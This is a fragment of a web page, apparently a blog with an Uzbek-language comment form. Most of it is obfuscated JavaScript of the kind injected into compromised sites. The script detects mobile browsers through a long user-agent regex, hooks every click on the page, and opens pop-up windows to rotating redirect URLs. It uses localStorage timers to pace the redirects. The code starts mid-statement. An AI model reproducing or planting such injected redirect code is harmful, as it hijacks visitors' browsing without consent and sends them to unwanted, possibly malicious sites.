_0x11f50a=_0x37c48c,_0x5b49e4=_0x68936e[_0x11f50a(0x1df)]((_0x304e08,_0x36eced)=>localStorage[_0x11f50a(0x1ef)](_0x304e08+_0x11f50a(0x200))==0x0);return _0x5b49e4[Math[_0x11f50a(0x1ff)](Math[_0x11f50a(0x1f7)]()*_0x5b49e4[_0x11f50a(0x1e0)])];},_0x49794b=_0x1fc657=>localStorage[_0x37c48c(0x1fa)](_0x1fc657+_0x37c48c(0x200),0x1),_0x45b4c1=_0x2b6a7b=>localStorage[_0x37c48c(0x1ef)](_0x2b6a7b+_0x37c48c(0x200)),_0x1a2453=(_0x4fa63b,_0x5a193b)=>localStorage[‘setItem’](_0x4fa63b+’-local-storage’,_0x5a193b),_0x4be146=(_0x5a70bc,_0x2acf43)=>{const _0x129e00=_0x37c48c,_0xf64710=0x3e8*0x3c*0x3c;return Math[’round’](Math[_0x129e00(0x1ed)](_0x2acf43-_0x5a70bc)/_0xf64710);},_0x5a2361=(_0x7e8d8a,_0x594da9)=>{const _0x2176ae=_0x37c48c,_0x1265d1=0x3e8*0x3c;return Math[_0x2176ae(0x1dc)](Math[_0x2176ae(0x1ed)](_0x594da9-_0x7e8d8a)/_0x1265d1);},_0x2d2875=(_0xbd1cc6,_0x21d1ac,_0x6fb9c2)=>{const _0x52c9f1=_0x37c48c;_0x4b7784(_0xbd1cc6),newLocation=_0x5531de(_0xbd1cc6),_0x1a2453(_0x21d1ac+_0x52c9f1(0x1fb),_0x6fb9c2),_0x1a2453(_0x21d1ac+’-hurs’,_0x6fb9c2),_0x49794b(newLocation),window[_0x52c9f1(0x1f2)]()&&window[_0x52c9f1(0x1ec)](newLocation,_0x52c9f1(0x1da));};_0x4b7784(_0x1f0b56),window[_0x37c48c(0x1f2)]=function(){const _0x573149=_0x37c48c;let _0x262ad1=![];return function(_0x264a55){const _0x49bda1=_0x9e23;if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x49bda1(0x1e7)](_0x264a55)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[‘test’](_0x264a55[_0x49bda1(0x1fe)](0x0,0x4)))_0x262ad1=!![];}(navigator[‘userAgent’]||navigator[_0x573149(0x1dd)]||window[‘opera’]),_0x262ad1;};function _0xfb5e65(_0x1bc2e8){const _0x595ec9=_0x37c48c;_0x1bc2e8[_0x595ec9(0x1d9)]();const _0xb17c69=location[‘host’];let _0x20f559=_0x5531de(_0x1f0b56);const _0x459fd3=Date[_0x595ec9(0x1e3)](new Date()),_0x300724=_0x45b4c1(_0xb17c69+_0x595ec9(0x1fb)),_0xaa16fb=_0x45b4c1(_0xb17c69+_0x595ec9(0x1ee));if(_0x300724&&_0xaa16fb)try{const _0x5edcfd=parseInt(_0x300724),_0xca73c6=parseInt(_0xaa16fb),_0x12d6f4=_0x5a2361(_0x459fd3,_0x5edcfd),_0x11bec0=_0x4be146(_0x459fd3,_0xca73c6);_0x11bec0>=_0x3edee4&&(_0x4b7784(_0x1f0b56),_0x1a2453(_0xb17c69+_0x595ec9(0x1ee),_0x459fd3)),_0x12d6f4>=_0x27386d&&(_0x20f559&&window[_0x595ec9(0x1f2)]()&&(_0x1a2453(_0xb17c69+_0x595ec9(0x1fb),_0x459fd3),window[_0x595ec9(0x1ec)](_0x20f559,_0x595ec9(0x1da)),_0x49794b(_0x20f559)));}catch(_0x57c50a){_0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}else _0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}document[_0x37c48c(0x1f1)](‘click’,_0xfb5e65);}());
Fikr bildirish

Email manzilingiz chop etilmaydi. Majburiy bandlar * bilan belgilangan